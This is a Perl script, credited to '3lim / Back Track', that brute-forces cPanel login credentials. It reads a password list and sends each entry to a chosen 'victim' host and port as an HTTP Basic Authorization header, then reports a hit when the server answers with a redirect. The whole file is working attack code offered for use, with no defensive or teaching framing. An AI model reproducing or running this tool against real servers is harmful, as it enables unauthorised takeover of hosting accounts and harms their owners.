#!/usr/bin/perl # Cpanel Password Brute Forcer # ---------------------------- # (c)oded By 3lim # Perl Version ( low speed ) # Oerginal Advisory : use IO::Socket; use LWP::Simple; use MIME::Base64; $host = $ARGV[0]; $user = $ARGV[1]; $port = $ARGV[2]; $list = $ARGV[3]; $file = $ARGV[4]; $url = "http://".$host.":".$port; if(@ARGV < 3){ print q( ############################################################### # Cpanel Password Brute Force Tool # ############################################################### # usage : cpanel.pl [HOST] [User] [PORT][list] [File] # #-------------------------------------------------------------# # [Host] : victim Host (simorgh-ev.com) # # [User] : User Name (demo) # # [PORT] : Port of Cpanel (2082) # #[list] : File Of password list (list.txt) # # [File] : file for save password (password.txt) # # # ############################################################### # (c)oded By 3lim / Back Track # ############################################################### );exit;} headx(); $numstart = "-1"; sub headx() { print q( ############################################################### # Cpanel Password Brute Force Tool # # (c)oded By 3lim / Back Track # ############################################################### ); open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !"; @PASSWORDS =; close PASSFILE; foreach my $P (@PASSWORDS) { chomp $P; $passwd = $P; print " [~] Try Password : $passwd "; &brut; }; } sub brut() { $authx = encode_base64($user.":".$passwd); print $authx; my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print " [-] Can not connect to the host"; print $sock "GET / HTTP/1.1 "; print $sock "Authorization: Basic $authx "; print $sock "Connection: Close "; read $sock, $answer, 128; close($sock); if ($answer =~ /Moved/) { print " [~] PASSWORD FOUND : $passwd "; exit(); } }
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